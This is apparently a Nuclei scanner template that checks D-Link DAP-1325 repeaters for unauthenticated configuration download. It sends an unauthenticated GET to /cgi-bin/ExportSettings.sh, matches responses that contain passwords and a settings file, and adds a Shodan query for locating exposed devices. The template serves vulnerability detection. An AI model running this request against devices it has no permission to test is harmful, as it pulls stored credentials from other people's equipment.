id: dlink-config-dump info: name: D-Link DAP-1325 - Information Disclosure author: gy741 severity: critical description: | Security vulnerability known as Unauthenticated access to settings or Unauthenticated configuration download. This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication. reference: - https://www.exploit-db.com/exploits/51556 - https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0 metadata: max-request: 1 shodan-query: title:"D-LINK" tags: config,dump,dlink,auth-bypass,disclosure http: - method: GET path: - "{{BaseURL}}/cgi-bin/ExportSettings.sh" matchers-condition: and matchers: - type: word part: body words: - "Password" case-insensitive: true - type: regex part: header regex: - 'filename="(.*)_Settings.dat' - 'application/octet-stream' condition: and - type: status status: - 200